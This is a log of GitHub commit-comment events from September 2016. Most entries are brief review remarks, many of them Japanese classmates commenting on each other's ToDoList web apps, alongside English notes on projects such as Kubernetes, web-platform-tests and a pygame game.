{"id":"4525213550","type":"CommitCommentEvent","actor":{"login":"hiroki-fujihara"},"repo":{"name":"ito-satoshi/ToDoList3"},"payload":{"comment":{"id":18922565,"position":null,"line":null,"path":null,"commit_id":"f3ae0c297f0a945b036d2c838201679d009d206b","created_at":"2016-09-07T03:25:08Z","updated_at":"2016-09-07T03:25:08Z","body":"文字化けは更新したら治ったよ👍\r\nあと、追加したからみてね(*´з`)"}},"created_at":"2016-09-07T03:25:08Z"}
{"id":"4525216100","type":"CommitCommentEvent","actor":{"login":"AndrewTheel"},"repo":{"name":"DarklightGames/DarkestHour"},"payload":{"comment":{"id":18922570,"position":null,"line":null,"path":null,"commit_id":"42835c4ef4446a2d179ac0dc35161574808f01b1","created_at":"2016-09-07T03:26:03Z","updated_at":"2016-09-07T03:26:03Z","body":"Learning SmartGit program, just testing stuff"}},"created_at":"2016-09-07T03:26:03Z"}
{"id":"4525216639","type":"CommitCommentEvent","actor":{"login":"rolandh"},"repo":{"name":"fenugrec/oj2534-fw"},"payload":{"comment":{"id":18922572,"position":null,"line":null,"path":null,"commit_id":"5337fceade21379969be07fd458d84e96f21926d","created_at":"2016-09-07T03:26:14Z","updated_at":"2016-09-07T03:26:14Z","body":"Couldn't find a contact for you anywhere so posting on here. How complete is the OJ2534-fw project. Does it support SetProgrammingVoltage with the evaluation board currently? I'm interested in contributing to the project as I'm looking for an open source firmware project that will allow me to flash various PCMs, the ones I'm interested in require raising the voltage of a pin to 12v during the flash process and this project looks as though it would be a good fit."}},"created_at":"2016-09-07T03:26:14Z"}
{"id":"4525217517","type":"CommitCommentEvent","actor":{"login":"hiroki-fujihara"},"repo":{"name":"usui-kazuki/ToDoList"},"payload":{"comment":{"id":18922577,"position":null,"line":null,"path":null,"commit_id":"fc50db0f3b1808c0e1bf47477c8920f2b98f13f7","created_at":"2016-09-07T03:26:34Z","updated_at":"2016-09-07T03:26:34Z","body":"パスワードの暗号化はすごいね◎"}},"created_at":"2016-09-07T03:26:34Z"}
{"id":"4525217978","type":"CommitCommentEvent","actor":{"login":"satsuma-toshiaki"},"repo":{"name":"ito-satoshi/ToDoList3"},"payload":{"comment":{"id":18922579,"position":null,"line":null,"path":null,"commit_id":"f3ae0c297f0a945b036d2c838201679d009d206b","created_at":"2016-09-07T03:26:44Z","updated_at":"2016-09-07T03:26:44Z","body":"さつまおおすぎ"}},"created_at":"2016-09-07T03:26:44Z"}
{"id":"4525218412","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"smason76/Homework-7"},"payload":{"comment":{"id":18922582,"position":15,"line":15,"path":"Assignment/boxes/index.html","commit_id":"d42399fe7223c5bfaf99f947b7b043f0c4fb26c4","created_at":"2016-09-07T03:26:54Z","updated_at":"2016-09-07T03:26:54Z","body":"this should be in the head, but excellent job remembering to add this piece. "}},"created_at":"2016-09-07T03:26:54Z"}
{"id":"4525221646","type":"CommitCommentEvent","actor":{"login":"furufumi"},"repo":{"name":"yoshikawa-mikako/ToDoList"},"payload":{"comment":{"id":18922589,"position":null,"line":null,"path":null,"commit_id":"d69e93d749e005cfc0e95a432603ad04f02669e1","created_at":"2016-09-07T03:28:14Z","updated_at":"2016-09-07T03:28:14Z","body":"トップがないのが少しわかりにくいかも！\r\n本の名前とか返却予定日はやること管理アプリにはいらないのでは！\r\nユーザーとカテゴリーだけ全部背景ピンクなのは仕様？"}},"created_at":"2016-09-07T03:28:14Z"}
{"id":"4525222429","type":"CommitCommentEvent","actor":{"login":"1260469514"},"repo":{"name":"1260469514/-"},"payload":{"comment":{"id":18922592,"position":1,"line":1,"path":"README.md","commit_id":"f79bff3cd51e8395fd4b987d4505c8da98fe8906","created_at":"2016-09-07T03:28:31Z","updated_at":"2016-09-07T03:28:31Z","body":"Hello,Everyone;\r\nThis my first GitHub project;"}},"created_at":"2016-09-07T03:28:31Z"}
{"id":"4525222702","type":"CommitCommentEvent","actor":{"login":"hiroki-fujihara"},"repo":{"name":"user-kuroda/ToDoList2"},"payload":{"comment":{"id":18922593,"position":null,"line":null,"path":null,"commit_id":"282ed570e90397c0d086bd2ab7c5f39100721520","created_at":"2016-09-07T03:28:38Z","updated_at":"2016-09-07T03:28:38Z","body":"破壊神が富士山を噴火させようとしてたよ・・・。\r\n世の中恐ろしいね👍"}},"created_at":"2016-09-07T03:28:38Z"}
{"id":"4525223976","type":"CommitCommentEvent","actor":{"login":"bdbabiak"},"repo":{"name":"jonthysell/Mzinga"},"payload":{"comment":{"id":18922596,"position":null,"line":null,"path":null,"commit_id":"45775367f0c4ff061e6b163fff1dd3cb9393333e","created_at":"2016-09-07T03:29:11Z","updated_at":"2016-09-07T03:29:11Z","body":"Attached is a game against the latest version days ago. I'm white, he's black. Transpos.Tables and Alpha etc true, maxdepth -1, maxturntime 1:30 I spent about 10 sec per move doing paperwork. I deliberately didn't beetle cover early, and I think you're right - it has other deficiencies really. It's definitely playing a little better. It has a good sense of pinning and playing gates. It likes getting ants in early. It was easy to line pieces up and save them 8-9 moves so it would be past its event horizon. \r\n![mzinga_game](https://cloud.githubusercontent.com/assets/4453419/18298852/b29856a0-7489-11e6-90bd-4c69031c7a66.PNG)\r\n"}},"created_at":"2016-09-07T03:29:11Z"}
{"id":"4525226863","type":"CommitCommentEvent","actor":{"login":"hiroki-fujihara"},"repo":{"name":"satsuma-toshiaki/ToDoList2"},"payload":{"comment":{"id":18922603,"position":null,"line":null,"path":null,"commit_id":"0a8645447fc7eaaf3bb28598429f825a7f9e8d7d","created_at":"2016-09-07T03:30:17Z","updated_at":"2016-09-07T03:30:17Z","body":"似たり寄ったりの内容で安心ｗ\r\n一緒に作った甲斐があったもんだ( *´艸｀)"}},"created_at":"2016-09-07T03:30:17Z"}
{"id":"4525228167","type":"CommitCommentEvent","actor":{"login":"teclxl"},"repo":{"name":"top-think/framework"},"payload":{"comment":{"id":18922605,"position":null,"line":null,"path":null,"commit_id":"bd0968b4076159993d94838d57093041545c2c50","created_at":"2016-09-07T03:30:43Z","updated_at":"2016-09-07T03:30:43Z","body":"我刚才试了下Request获取模块/控制器/操作名称的三个方法。模块名是下划线分隔小写（我的模块名也是采用下划线分隔小写的命名方式），控制器名是驼峰法，操作名是全小写无分隔。这三个名称现在有点混乱，即不是全部返回真实名称（操作名不是），也不是全部返回映射到Url上的名称（控制器名不是）。我觉得这个还是有必要统一一下"}},"created_at":"2016-09-07T03:30:43Z"}
{"id":"4525230148","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"smason76/Homework-7"},"payload":{"comment":{"id":18922606,"position":389,"line":295,"path":"Assignment/starter_code/css/style.css","commit_id":"d42399fe7223c5bfaf99f947b7b043f0c4fb26c4","created_at":"2016-09-07T03:31:28Z","updated_at":"2016-09-07T03:31:28Z","body":"You can save yourself a lot of typing when you're working on a site by making the font-size definitions in ems throughout the different layout sizes. This allows you to adjust the font sizes in much broader strokes by just tweaking the font size on the html element. "}},"created_at":"2016-09-07T03:31:28Z"}
{"id":"4525231694","type":"CommitCommentEvent","actor":{"login":"lazywinadmin"},"repo":{"name":"FrPSUG/frpsug.github.io"},"payload":{"comment":{"id":18922609,"position":null,"line":null,"path":null,"commit_id":"da16e7994f9a3469c73f132fdd2266e731d8d6d8","created_at":"2016-09-07T03:32:06Z","updated_at":"2016-09-07T03:32:06Z","body":"Hehe merci :-)"}},"created_at":"2016-09-07T03:32:06Z"}
{"id":"4525233676","type":"CommitCommentEvent","actor":{"login":"ruiguo11"},"repo":{"name":"ruiguo11/Build-it-big"},"payload":{"comment":{"id":18922611,"position":null,"line":null,"path":null,"commit_id":"6f05ad45cc34862699c6f18a22710a10513a39a0","created_at":"2016-09-07T03:32:53Z","updated_at":"2016-09-07T03:32:53Z","body":"## This project is part of Udacity Android Nanodegree Program.\r\n\r\nThe requirment of this project is [here](https://github.com/udacity/ud867/tree/master/FinalProject#required-components)\r\n\r\n### Required Components:\r\nProject contains a Java library for supplying jokes\r\nProject contains an Android library with an activity that displays jokes passed to it as intent extras.\r\nProject contains a Google Cloud Endpoints module that supplies jokes from the Java library. Project loads jokes from GCE module via an async task.\r\nProject contains connected tests to verify that the async task is indeed loading jokes.\r\nProject contains paid/free flavors. The paid flavor has no ads, and no unnecessary dependencies.\r\n\r\n### Required Behavior\r\nApp retrieves jokes from Google Cloud Endpoints module and displays them via an Activity from the Android Library.\r\n\r\n### Optional Components\r\nOnce you have a functioning project, consider adding more features to test your Gradle and Android skills. Here are a few suggestions:\r\n\r\nMake the free app variant display interstitial ads between the main activity and the joke-displaying activity.\r\nHave the app display a loading indicator while the joke is being fetched from the server.\r\nWrite a Gradle task that starts the GCE dev server, runs all the Android tests, and shuts down the dev server.\r\n"}},"created_at":"2016-09-07T03:32:53Z"}
{"id":"4525233708","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"smason76/Homework-7"},"payload":{"comment":{"id":18922612,"position":null,"line":null,"path":null,"commit_id":"d42399fe7223c5bfaf99f947b7b043f0c4fb26c4","created_at":"2016-09-07T03:32:54Z","updated_at":"2016-09-07T03:32:54Z","body":"Nice work and good job remembering the viewport meta tag. Remember to size your fonts in ems so you can just scale the html font-size property up and down. "}},"created_at":"2016-09-07T03:32:54Z"}
{"id":"4525235302","type":"CommitCommentEvent","actor":{"login":"hiroki-fujihara"},"repo":{"name":"kato-yutaka/ToDoList"},"payload":{"comment":{"id":18922614,"position":null,"line":null,"path":null,"commit_id":"7294b7ac14261d64de7a9580602a8a1fa5e2c90e","created_at":"2016-09-07T03:33:34Z","updated_at":"2016-09-07T03:33:34Z","body":"上のメニューっていうのかわからないけど、全部タスク一覧になってたから困惑しました。\r\nパスワードの暗号化はすごいんだからそこをちゃんと直したほうがいいよ。"}},"created_at":"2016-09-07T03:33:34Z"}
{"id":"4525235606","type":"CommitCommentEvent","actor":{"login":"miurahiroki"},"repo":{"name":"miurahiroki/ToDoList"},"payload":{"comment":{"id":18922616,"position":null,"line":null,"path":null,"commit_id":"b0b9c3c4111bf9937e2d92eca31032fe6bf6f88c","created_at":"2016-09-07T03:33:42Z","updated_at":"2016-09-07T03:33:42Z","body":"https://pacific-fjord-76412.herokuapp.com/tasks\r\n課題提出しました\r\n遅れてすいませんでした。"}},"created_at":"2016-09-07T03:33:42Z"}
{"id":"4525236043","type":"CommitCommentEvent","actor":{"login":"tmathews"},"repo":{"name":"DerrickGold/Remote-Music-Player"},"payload":{"comment":{"id":18922617,"position":143,"line":307,"path":"static/js/MusicPlayer.js","commit_id":"e4939c9544fe6c8b820387a1d5f58edfaf563f9f","created_at":"2016-09-07T03:33:54Z","updated_at":"2016-09-07T03:33:54Z","body":"Chop log"}},"created_at":"2016-09-07T03:33:54Z"}
{"id":"4525236125","type":"CommitCommentEvent","actor":{"login":"furufumi"},"repo":{"name":"yasuda-yuka/ToDoList"},"payload":{"comment":{"id":18922618,"position":null,"line":null,"path":null,"commit_id":"4265e1f87152545d4f689a558bb3de75a3c1f263","created_at":"2016-09-07T03:33:55Z","updated_at":"2016-09-07T03:33:55Z","body":"フォントが違って良い👍\r\n![yasu](https://cloud.githubusercontent.com/assets/18651978/18298883/f4d11ddc-74f6-11e6-84a2-1e6620a3422f.png)\r\n\r\n英語の後に訳があるのはそういう仕様？\r\nトップがないのがわかりにくいかも！"}},"created_at":"2016-09-07T03:33:55Z"}
{"id":"4525238653","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"usui-kazuki/ToDoList"},"payload":{"comment":{"id":18922620,"position":null,"line":null,"path":null,"commit_id":"fc50db0f3b1808c0e1bf47477c8920f2b98f13f7","created_at":"2016-09-07T03:35:02Z","updated_at":"2016-09-07T03:35:02Z","body":"👍"}},"created_at":"2016-09-07T03:35:02Z"}
{"id":"4525239800","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"fukano-ren/ToDoList"},"payload":{"comment":{"id":18922622,"position":null,"line":null,"path":null,"commit_id":"e741b659dae711e0d86dcd0d4a0acbb4a7780185","created_at":"2016-09-07T03:35:32Z","updated_at":"2016-09-07T03:35:32Z","body":"👍"}},"created_at":"2016-09-07T03:35:32Z"}
{"id":"4525241309","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"satsuma-toshiaki/ToDoList2"},"payload":{"comment":{"id":18922624,"position":null,"line":null,"path":null,"commit_id":"0a8645447fc7eaaf3bb28598429f825a7f9e8d7d","created_at":"2016-09-07T03:36:09Z","updated_at":"2016-09-07T03:36:09Z","body":"👍"}},"created_at":"2016-09-07T03:36:09Z"}
{"id":"4525242228","type":"CommitCommentEvent","actor":{"login":"user-kuroda"},"repo":{"name":"yoshikawa-mikako/ToDoList"},"payload":{"comment":{"id":18922629,"position":null,"line":null,"path":null,"commit_id":"d69e93d749e005cfc0e95a432603ad04f02669e1","created_at":"2016-09-07T03:36:32Z","updated_at":"2016-09-07T03:36:32Z","body":"カテゴリーとユーザーを選択しなくても登録できるようになってます。"}},"created_at":"2016-09-07T03:36:32Z"}
{"id":"4525242385","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"user-kuroda/ToDoList2"},"payload":{"comment":{"id":18922630,"position":null,"line":null,"path":null,"commit_id":"282ed570e90397c0d086bd2ab7c5f39100721520","created_at":"2016-09-07T03:36:36Z","updated_at":"2016-09-07T03:36:36Z","body":"👍"}},"created_at":"2016-09-07T03:36:36Z"}
{"id":"4525243029","type":"CommitCommentEvent","actor":{"login":"srayyan"},"repo":{"name":"ChristopherChudzicki/jsinput-freebodydraw"},"payload":{"comment":{"id":18922632,"position":82,"line":884,"path":"freebodydraw.js","commit_id":"da9178ccb60b0848a0652c62590e7efdc9960c3d","created_at":"2016-09-07T03:36:52Z","updated_at":"2016-09-07T03:36:52Z","body":"shouldn't be from k on j? @ChristopherChudzicki "}},"created_at":"2016-09-07T03:36:52Z"}
{"id":"4525244006","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"kato-yutaka/ToDoList"},"payload":{"comment":{"id":18922635,"position":null,"line":null,"path":null,"commit_id":"7294b7ac14261d64de7a9580602a8a1fa5e2c90e","created_at":"2016-09-07T03:37:15Z","updated_at":"2016-09-07T03:37:15Z","body":"👍"}},"created_at":"2016-09-07T03:37:15Z"}
{"id":"4525244150","type":"CommitCommentEvent","actor":{"login":"wolenetz"},"repo":{"name":"w3c/web-platform-tests"},"payload":{"comment":{"id":18922636,"position":30,"line":139,"path":"media-source/mediasource-duration.html","commit_id":"ac5ec11034dd80aea6f3078b070b82bc107600b7","created_at":"2016-09-07T03:37:19Z","updated_at":"2016-09-07T03:37:19Z","body":"Note, this has merged already. Also, I don't see how it is incorrect:\r\nendOfStream() occurs just prior to this code block, correctly increasing the duration attributes, but *not* changing the value of \"truncatedDuration\", which was just seeked to. The 'seeked' event indicates that endOfStream() enabled the seek to complete, and currentTime is at least truncatedDuration or higher here. Later in this code block, truncatedDuration is updated to be the real expected current duration resulting from that endOfStream() call.\r\n\r\nPlease prepare a new PR if you believe the current mediasource-duration.html is defective; continuing to comment on an already-merged PR would otherwise make this conversation hard to track."}},"created_at":"2016-09-07T03:37:19Z"}
{"id":"4525244844","type":"CommitCommentEvent","actor":{"login":"furufumi"},"repo":{"name":"maeda-naho/ToDoList"},"payload":{"comment":{"id":18922637,"position":null,"line":null,"path":null,"commit_id":"852c9bfd876c58816147e4cccc49f42e0f59fd69","created_at":"2016-09-07T03:37:39Z","updated_at":"2016-09-07T03:37:39Z","body":"トップがないのがわかりにくいかも\r\n表があってわかりやすい👍\r\n本の名前と返却予定日はやること管理アプリだとちょっと違うかも！"}},"created_at":"2016-09-07T03:37:39Z"}
{"id":"4525246177","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"fukuda-nanami/ToDoList"},"payload":{"comment":{"id":18922639,"position":null,"line":null,"path":null,"commit_id":"8f1c843a006bd05abcde19eb0dca41fabb5eb113","created_at":"2016-09-07T03:38:13Z","updated_at":"2016-09-07T03:38:13Z","body":"👍"}},"created_at":"2016-09-07T03:38:13Z"}
{"id":"4525246470","type":"CommitCommentEvent","actor":{"login":"hugoaguirre"},"repo":{"name":"juanjosegzl/learningpygame"},"payload":{"comment":{"id":18922640,"position":6,"line":7,"path":"main.py","commit_id":"c505cce3e80280856cdbd71f986e7021d49e6a4a","created_at":"2016-09-07T03:38:21Z","updated_at":"2016-09-07T03:38:21Z","body":"Seems I am using an old version of the code, some of the PRs available might solve Shot class import"}},"created_at":"2016-09-07T03:38:21Z"}
{"id":"4525247780","type":"CommitCommentEvent","actor":{"login":"HYhy5"},"repo":{"name":"blue-zj/MusicPlay"},"payload":{"comment":{"id":18922641,"position":null,"line":null,"path":null,"commit_id":"99323959788f071e74cefe53768d017fd5044174","created_at":"2016-09-07T03:38:52Z","updated_at":"2016-09-07T03:38:52Z","body":"greate  "}},"created_at":"2016-09-07T03:38:52Z"}
{"id":"4525247923","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"fsst1998/ToDoList"},"payload":{"comment":{"id":18922642,"position":null,"line":null,"path":null,"commit_id":"2458006a1c095f65afced0c165fdd7ecef80a375","created_at":"2016-09-07T03:38:55Z","updated_at":"2016-09-07T03:38:55Z","body":"👍"}},"created_at":"2016-09-07T03:38:55Z"}
{"id":"4525248124","type":"CommitCommentEvent","actor":{"login":"smarterclayton"},"repo":{"name":"smarterclayton/kubernetes"},"payload":{"comment":{"id":18922644,"position":44,"line":44,"path":"pkg/util/config/feature_gate.go","commit_id":"51198f59da4cab0c2a17bafd09667e2ef7690fbd","created_at":"2016-09-07T03:39:00Z","updated_at":"2016-09-07T03:39:00Z","body":"Why are the constants here - in a util package - rather than in something specific to kubernetes like `pkg/features`?  Someone who wants to reuse the feature gate for their own gates (say in an extension project) would have to reimplement this."}},"created_at":"2016-09-07T03:39:00Z"}
{"id":"4525248734","type":"CommitCommentEvent","actor":{"login":"hugoaguirre"},"repo":{"name":"juanjosegzl/learningpygame"},"payload":{"comment":{"id":18922645,"position":28,"line":32,"path":"main.py","commit_id":"c505cce3e80280856cdbd71f986e7021d49e6a4a","created_at":"2016-09-07T03:39:16Z","updated_at":"2016-09-07T03:39:16Z","body":"Needed before firing them.. just to detect collision on walls. "}},"created_at":"2016-09-07T03:39:16Z"}
{"id":"4525248945","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"hiroki-fujihara/ToDoList2"},"payload":{"comment":{"id":18922646,"position":null,"line":null,"path":null,"commit_id":"332389440a51848f687b9e9363b9c4037d9d12d7","created_at":"2016-09-07T03:39:22Z","updated_at":"2016-09-07T03:39:22Z","body":"👍"}},"created_at":"2016-09-07T03:39:22Z"}
{"id":"4525249151","type":"CommitCommentEvent","actor":{"login":"Jake-Sutton"},"repo":{"name":"Jake-Sutton/Hexity"},"payload":{"comment":{"id":18922647,"position":null,"line":null,"path":null,"commit_id":"de555d4c8db50a969122cf4bd848ebb5296d02d1","created_at":"2016-09-07T03:39:27Z","updated_at":"2016-09-07T03:39:27Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;iHBY2SJ1&#x2F;21-as-a-user-i-should-be-able-to-create-a-hex-that-takes-values-for-its-namedmembers-hex-should-subclass-objectpool\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a user I should be able to create a &#39;Hex&#39; that takes values for its NamedMembers. Hex should subclass ObjectPool.</a>"}},"created_at":"2016-09-07T03:39:27Z"}
{"id":"4525249792","type":"CommitCommentEvent","actor":{"login":"Jake-Sutton"},"repo":{"name":"Jake-Sutton/Hexity"},"payload":{"comment":{"id":18922649,"position":null,"line":null,"path":null,"commit_id":"de555d4c8db50a969122cf4bd848ebb5296d02d1","created_at":"2016-09-07T03:39:42Z","updated_at":"2016-09-07T03:39:42Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Jjkz9wUi&#x2F;22-as-a-user-i-should-not-have-to-worry-about-objects-and-object-pools-objects-should-become-object-pools\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As a user I should not have to worry about Objects and Object Pools. Objects should become object pools.</a>"}},"created_at":"2016-09-07T03:39:42Z"}
{"id":"4525250546","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"maeda-naho/ToDoList"},"payload":{"comment":{"id":18922652,"position":null,"line":null,"path":null,"commit_id":"852c9bfd876c58816147e4cccc49f42e0f59fd69","created_at":"2016-09-07T03:39:59Z","updated_at":"2016-09-07T03:39:59Z","body":"👍"}},"created_at":"2016-09-07T03:39:59Z"}
{"id":"4525251478","type":"CommitCommentEvent","actor":{"login":"satsuma-toshiaki"},"repo":{"name":"furufumi/ToDoList"},"payload":{"comment":{"id":18922655,"position":null,"line":null,"path":null,"commit_id":"11a3ccb2ff5960714467e2a068a4633c47bcf0a0","created_at":"2016-09-07T03:40:21Z","updated_at":"2016-09-07T03:40:21Z","body":"背景がよかった(　´∀｀)bｸﾞｯ!"}},"created_at":"2016-09-07T03:40:21Z"}
{"id":"4525251914","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"yasuda-yuka/ToDoList"},"payload":{"comment":{"id":18922656,"position":null,"line":null,"path":null,"commit_id":"4265e1f87152545d4f689a558bb3de75a3c1f263","created_at":"2016-09-07T03:40:32Z","updated_at":"2016-09-07T03:40:32Z","body":"👍"}},"created_at":"2016-09-07T03:40:32Z"}
{"id":"4525252012","type":"CommitCommentEvent","actor":{"login":"hugoaguirre"},"repo":{"name":"juanjosegzl/learningpygame"},"payload":{"comment":{"id":18922657,"position":32,"line":59,"path":"world.py","commit_id":"c505cce3e80280856cdbd71f986e7021d49e6a4a","created_at":"2016-09-07T03:40:34Z","updated_at":"2016-09-07T03:40:34Z","body":"We could refactor the whole detect_collisions function.\r\n\r\nPerhaps having a class named: Collidable and having each Entity implement it."}},"created_at":"2016-09-07T03:40:34Z"}
{"id":"4525253103","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"furufumi/ToDoList"},"payload":{"comment":{"id":18922659,"position":null,"line":null,"path":null,"commit_id":"11a3ccb2ff5960714467e2a068a4633c47bcf0a0","created_at":"2016-09-07T03:41:03Z","updated_at":"2016-09-07T03:41:03Z","body":"👍"}},"created_at":"2016-09-07T03:41:03Z"}
{"id":"4525254830","type":"CommitCommentEvent","actor":{"login":"Mr-Leezhuang"},"repo":{"name":"Mr-Leezhuang/gitskills"},"payload":{"comment":{"id":18922662,"position":null,"line":null,"path":null,"commit_id":"5ea9518ab5e4e66942fab6175563f47f7d1cb329","created_at":"2016-09-07T03:41:41Z","updated_at":"2016-09-07T03:41:41Z","body":"111111111"}},"created_at":"2016-09-07T03:41:41Z"}
{"id":"4525254959","type":"CommitCommentEvent","actor":{"login":"furufumi"},"repo":{"name":"fsst1998/ToDoList"},"payload":{"comment":{"id":18922663,"position":null,"line":null,"path":null,"commit_id":"2458006a1c095f65afced0c165fdd7ecef80a375","created_at":"2016-09-07T03:41:44Z","updated_at":"2016-09-07T03:41:44Z","body":"トップに文字があるとわかりやすい\r\n画像があるのがいい👍\r\n文字が大きいので見やすい👍"}},"created_at":"2016-09-07T03:41:44Z"}
{"id":"4525255253","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18922664,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-07T03:41:50Z","updated_at":"2016-09-07T03:41:50Z","body":"GL"}},"created_at":"2016-09-07T03:41:50Z"}
{"id":"4525255436","type":"CommitCommentEvent","actor":{"login":"satsuma-toshiaki"},"repo":{"name":"yoshikawa-mikako/ToDoList"},"payload":{"comment":{"id":18922665,"position":null,"line":null,"path":null,"commit_id":"d69e93d749e005cfc0e95a432603ad04f02669e1","created_at":"2016-09-07T03:41:55Z","updated_at":"2016-09-07T03:41:55Z","body":"シンプル　イズ　ベストっ！"}},"created_at":"2016-09-07T03:41:55Z"}
{"id":"4525255544","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"Yoshida-Akiho/ToDoList"},"payload":{"comment":{"id":18922667,"position":null,"line":null,"path":null,"commit_id":"f085a383c59f651f59941197aac23c3b7676ae65","created_at":"2016-09-07T03:41:58Z","updated_at":"2016-09-07T03:41:58Z","body":"👍"}},"created_at":"2016-09-07T03:41:58Z"}
{"id":"4525255988","type":"CommitCommentEvent","actor":{"login":"user-kuroda"},"repo":{"name":"yoshikawa-mikako/ToDoList"},"payload":{"comment":{"id":18922669,"position":null,"line":null,"path":null,"commit_id":"d69e93d749e005cfc0e95a432603ad04f02669e1","created_at":"2016-09-07T03:42:10Z","updated_at":"2016-09-07T03:42:10Z","body":"何度もごめん！\r\n削除のアクションを起こしたらThe page you were looking for doesn't exist.ってページに飛びます。\r\n削除自体はできてるみたいだけど。"}},"created_at":"2016-09-07T03:42:10Z"}
{"id":"4525256305","type":"CommitCommentEvent","actor":{"login":"dennisss"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18922675,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-07T03:42:16Z","updated_at":"2016-09-07T03:42:16Z","body":"Sensors and flight all working fine. Although, I seem to now be unable to use mavlink over USB although nshterm over USB works (both work on current master)."}},"created_at":"2016-09-07T03:42:16Z"}
{"id":"4525256869","type":"CommitCommentEvent","actor":{"login":"ito-satoshi"},"repo":{"name":"yoshikawa-mikako/ToDoList"},"payload":{"comment":{"id":18922676,"position":null,"line":null,"path":null,"commit_id":"d69e93d749e005cfc0e95a432603ad04f02669e1","created_at":"2016-09-07T03:42:31Z","updated_at":"2016-09-07T03:42:31Z","body":"👍"}},"created_at":"2016-09-07T03:42:31Z"}
{"id":"4525257715","type":"CommitCommentEvent","actor":{"login":"OldStd"},"repo":{"name":"OldStd/OldStd.github.io"},"payload":{"comment":{"id":18922684,"position":null,"line":null,"path":null,"commit_id":"8df4535f9a8956d90eb74c4557ad92c01d79511f","created_at":"2016-09-07T03:42:53Z","updated_at":"2016-09-07T03:42:53Z","body":"This is required to create a new repository."}},"created_at":"2016-09-07T03:42:53Z"}
{"id":"4525258648","type":"CommitCommentEvent","actor":{"login":"HYhy5"},"repo":{"name":"blue-zj/MusicPlay"},"payload":{"comment":{"id":18922686,"position":null,"line":null,"path":null,"commit_id":"7baa5b140c8337b10e1c807de2042b7c8a41c6f2","created_at":"2016-09-07T03:43:17Z","updated_at":"2016-09-07T03:43:17Z","body":"Awesome"}},"created_at":"2016-09-07T03:43:17Z"}
{"id":"4525261461","type":"CommitCommentEvent","actor":{"login":"satsuma-toshiaki"},"repo":{"name":"miurahiroki/ToDoList"},"payload":{"comment":{"id":18922695,"position":null,"line":null,"path":null,"commit_id":"b0b9c3c4111bf9937e2d92eca31032fe6bf6f88c","created_at":"2016-09-07T03:44:26Z","updated_at":"2016-09-07T03:44:26Z","body":"伸びしろが広そう"}},"created_at":"2016-09-07T03:44:26Z"}
{"id":"4525261550","type":"CommitCommentEvent","actor":{"login":"zbholman"},"repo":{"name":"joeoakes/PSUABFA16IST440"},"payload":{"comment":{"id":18922696,"position":null,"line":null,"path":null,"commit_id":"652bcf2a7d264a7d9fafca9f3c1561d6c1405269","created_at":"2016-09-07T03:44:28Z","updated_at":"2016-09-07T03:44:28Z","body":"Can confirm, Abu is awesome."}},"created_at":"2016-09-07T03:44:28Z"}
{"id":"4525262833","type":"CommitCommentEvent","actor":{"login":"hiroki-fujihara"},"repo":{"name":"fsst1998/ToDoList"},"payload":{"comment":{"id":18922697,"position":null,"line":null,"path":null,"commit_id":"2458006a1c095f65afced0c165fdd7ecef80a375","created_at":"2016-09-07T03:45:02Z","updated_at":"2016-09-07T03:45:02Z","body":"いいじゃなーい( *´艸｀)"}},"created_at":"2016-09-07T03:45:02Z"}
{"id":"4525263430","type":"CommitCommentEvent","actor":{"login":"satsuma-toshiaki"},"repo":{"name":"Yoshida-Akiho/ToDoList"},"payload":{"comment":{"id":18922699,"position":null,"line":null,"path":null,"commit_id":"f085a383c59f651f59941197aac23c3b7676ae65","created_at":"2016-09-07T03:45:17Z","updated_at":"2016-09-07T03:45:17Z","body":"デザインがいい！"}},"created_at":"2016-09-07T03:45:17Z"}
{"id":"4525264718","type":"CommitCommentEvent","actor":{"login":"bryanlandia"},"repo":{"name":"appsembler/xblock-wistia"},"payload":{"comment":{"id":18922703,"position":8,"line":7,"path":"README.md","commit_id":"a96fb3da0a745c92684300065bba1acb7bc0843a","created_at":"2016-09-07T03:45:49Z","updated_at":"2016-09-07T03:45:49Z","body":"This should be `#egg=wistiavideo\"`"}},"created_at":"2016-09-07T03:45:49Z"}
{"id":"4525265227","type":"CommitCommentEvent","actor":{"login":"furufumi"},"repo":{"name":"ito-satoshi/ToDoList3"},"payload":{"comment":{"id":18922706,"position":null,"line":null,"path":null,"commit_id":"f3ae0c297f0a945b036d2c838201679d009d206b","created_at":"2016-09-07T03:46:01Z","updated_at":"2016-09-07T03:46:01Z","body":"文字化け直りやした！\r\n作業中が赤いのが良い👍\r\nでも必ずしも作業ではないかもしれない！\r\n登録だけ下なのがわかりやすい👍\r\nユーザーだけ右寄りなのはなぜ？\r\n表になっててわかりやすい👍\r\n"}},"created_at":"2016-09-07T03:46:01Z"}
